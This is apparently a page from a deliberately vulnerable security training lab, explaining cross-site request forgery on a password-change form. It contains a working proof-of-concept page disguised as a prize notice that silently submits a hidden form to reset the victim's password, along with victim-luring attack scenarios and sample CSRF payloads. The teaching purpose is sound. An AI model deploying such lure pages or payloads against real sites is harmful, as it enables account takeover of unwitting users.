Change Password
Change Email
๐ฏ CSRF PoC (Proof of Concept)
Save this as an HTML file and open it to see the CSRF attack in action:
<!DOCTYPE html>
<html>
<head>
<title>Congratulations! You Won!</title>
</head>
<body>
<h1>๐ Congratulations!</h1>
<p>You've won a prize! Click below to claim.</p>
<!-- Hidden CSRF attack form -->
<iframe name="csrf_frame" style="display:none"></iframe>
<form id="csrf_form" method="POST"
action="http://localhost/vulnlab/vulnerabilities/csrf/"
target="csrf_frame">
<input type="hidden" name="new_password" value="hacked123">
<input type="hidden" name="confirm_password" value="hacked123">
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
๐ฏ Vulnerability Info
Type: Cross-Site Request Forgery (CSRF)
Severity: High
๐ก How to Exploit
- No CSRF token in forms
- Actions executed based on session only
- Attacker can create malicious page
- Victim's browser sends authenticated request
๐งช Attack Scenarios
- Create malicious HTML page with hidden form
- Form targets this password change URL
- Trick victim into visiting your page
- Form auto-submits, changing victim's password
๐ง Burp Suite Testing
1. Capture password change request
2. Right-click โ Engagement tools โ
Generate CSRF PoC
3. Copy the generated HTML
4. Test in browser
๐ Simple CSRF Payloads
<!-- Image tag (GET) -->
<img src="http://localhost/vulnlab/
vulnerabilities/csrf/?action=delete">
<!-- Auto-submit form -->
<body onload="document.forms[0].submit()">
<form method="POST" action="...">
<input type="hidden" name="..." value="...">
</form>
</body>
โ ๏ธ Impact
- Unauthorized password change
- Account takeover
- Funds transfer
- Data modification